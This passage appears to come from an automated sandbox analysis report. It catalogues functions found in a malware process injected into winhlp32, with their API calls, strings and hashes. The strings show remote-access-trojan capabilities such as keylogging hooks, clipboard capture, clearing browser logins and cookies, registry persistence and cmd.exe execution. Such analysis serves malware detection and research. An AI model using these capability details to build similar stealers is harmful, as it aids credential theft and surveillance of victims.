                                    • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                    • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                    • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                    • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                    • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
                                    • RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: pth_unenc
                                    • API String ID: 1818849710-4028850238
                                    • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                    • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                    • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                    • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                    • String ID: bad locale name
                                    • API String ID: 3628047217-1405518554
                                    • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                    • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                    • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                    • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                    • ShowWindow.USER32(00000009), ref: 00416C61
                                    • SetForegroundWindow.USER32 ref: 00416C6D
                                      • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                      • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                      • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                    • String ID: !D@
                                    • API String ID: 3446828153-604454484
                                    • Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                    • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                    • Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                    • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: /C $cmd.exe$open
                                    • API String ID: 587946157-3896048727
                                    • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                    • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                    • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                    • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                    • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                    • TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: TerminateThread$HookUnhookWindows
                                    • String ID: pth_unenc
                                    • API String ID: 3123878439-4028850238
                                    • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                    • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                    • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                    • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: GetCursorInfo$User32.dll
                                    • API String ID: 1646373207-2714051624
                                    • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                    • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                    • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                    • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                    • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetLastInputInfo$User32.dll
                                    • API String ID: 2574300362-1519888992
                                    • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                    • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                    • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                    • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __alldvrm$_strrchr
                                    • String ID:
                                    • API String ID: 1036877536-0
                                    • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                    • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                    • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                    • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                    • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                    • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                    • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                    • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                    • API String ID: 3472027048-1236744412
                                    • Opcode ID: f1247b9b7b7232e3c2b0df6ea8e4249d3c093c33305ff24fa1c69204234e4c98
                                    • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                    • Opcode Fuzzy Hash: f1247b9b7b7232e3c2b0df6ea8e4249d3c093c33305ff24fa1c69204234e4c98
                                    • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                      • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                      • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                    • Sleep.KERNEL32(000001F4), ref: 0040A573
                                    • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$ForegroundLength
                                    • String ID: [ $ ]
                                    • API String ID: 3309952895-93608704
                                    • Opcode ID: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                                    • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                    • Opcode Fuzzy Hash: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                                    • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                    • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                    • Opcode Fuzzy Hash: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                    • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                                    • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                    • Opcode Fuzzy Hash: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                                    • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                    • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                    • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                    • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                    • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                                    • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleReadSize
                                    • String ID:
                                    • API String ID: 3919263394-0
                                    • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                    • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                    • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                    • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleOpenProcess
                                    • String ID:
                                    • API String ID: 39102293-0
                                    • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                    • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                    • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                    • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                      • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                    • _UnwindNestedFrames.LIBCMT ref: 00439891
                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                    • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                    • String ID:
                                    • API String ID: 2633735394-0
                                    • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                    • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                    • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                    • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                    • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                    • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                    • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MetricsSystem
                                    • String ID:
                                    • API String ID: 4116985748-0
                                    • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                    • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                    • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                    • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                      • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                    • String ID:
                                    • API String ID: 1761009282-0
                                    • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                    • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                    • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                    • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                    Download Yara Rule
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                    • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                    • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                    • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • __Init_thread_footer.LIBCMT ref: 0040B797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                    • API String ID: 1881088180-3686566968
                                    • Opcode ID: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
                                    • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                    • Opcode Fuzzy Hash: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
                                    • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ACP$OCP
                                    • API String ID: 0-711371036
                                    • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                    • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                    • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                    • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
